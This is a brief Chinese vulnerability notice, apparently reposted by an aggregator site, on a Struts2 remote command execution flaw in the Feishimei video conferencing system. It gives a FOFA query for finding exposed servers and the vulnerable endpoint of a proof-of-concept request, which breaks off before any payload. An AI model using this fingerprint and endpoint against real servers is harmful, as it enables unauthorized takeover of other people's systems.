飞视美 视频会议系统 Struts2 远程命令执行漏洞
Posted 李白你好
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了飞视美 视频会议系统 Struts2 远程命令执行漏洞相关的知识,希望对你有一定的参考价值。
0x01 漏洞描述
飞视美(facemeeting):为即租即用的全新一代视频会议产品,服务中小企业各类会议、协同办公等领域,通过网络进行异地实时的音视频沟通,协助中小企业构建高效、智能的统一通信系统平台。飞视美 视频会议系统存在Struts2远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限。
0x02 漏洞指纹
FOFA
app="飞视美-视频会议系统"
0x03 漏洞复现
执行ipconfig /all的POC,得到回显
POST /confinfoaction!showallConfinfos.action HTTP/1.1
Host<以上是关于飞视美 视频会议系统 Struts2 远程命令执行漏洞的主要内容,如果未能解决你的问题,请参考以下文章